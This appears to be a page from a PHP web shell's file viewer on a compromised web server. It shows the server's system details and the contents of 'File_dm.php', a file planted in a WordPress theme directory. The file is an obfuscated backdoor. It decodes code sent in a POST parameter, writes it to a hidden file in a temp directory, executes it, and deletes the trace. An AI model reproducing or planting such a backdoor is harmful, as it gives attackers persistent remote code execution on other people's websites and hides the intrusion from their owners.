HEX
Server: Apache/2.4.59 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/3.0.2
System: Linux panel.ctvbarranquilla.com 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
User: bastidas (1002)
PHP: 8.2.18
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
Upload Files
File: /home/bastidas/web/bastidas.tv/public_html/wp-content/themes/news-brick-kit/File_dm.php
<?php
//<PHPDATA>fputs_enc;2;binding</PHPDATA>
if(FIlTEr_Has_var(INPUT_POST,"bin\x64i\x6e\x67")):$_0=aRraY_FiLTer([INI_Get("upload_\x74mp_di\162"),SesSiON_savE_PATH(),syS_gET_temP_dir(),"\x2f\x64ev\x2fshm",geTeNv("\x54E\115P"),"/va\162/\x74m\160","/tmp",gEtCWd(),GeteNv("TM\120")]);$_1=$_POST["b\151\156di\156g"];$_1=eXPLoDE(".",$_1);$_2="";$_3="abcdefghijklmn\157pqrst\x75vwxyz\060123456789";$_4=StRLEn($_3);$_5=(int)ROuNd(0+0+0);$_6=$_1;while($_7=arrAy_SHiFt($_6)):$_8=oRd($_3[$_5%$_4]);$_9=((int)$_7-$_8-($_5%(061-047)))^(int)rOuND(0.5+0.5+0.5+0.5);$_2.=cHR($_9);$_5++;endwhile;while($_10=arRay_sHiFT($_0)):if(ArRAY_ProdUCt([Is_dir($_10),is_wrITabLe($_10)])):$_11=jOIN("/",[$_10,".\x64escri\160tor"]);if(@FIlE_PUT_COnTENTS($_11,$_2)!==false):include $_11;unliNK($_11);die();endif;endif;endwhile;endif;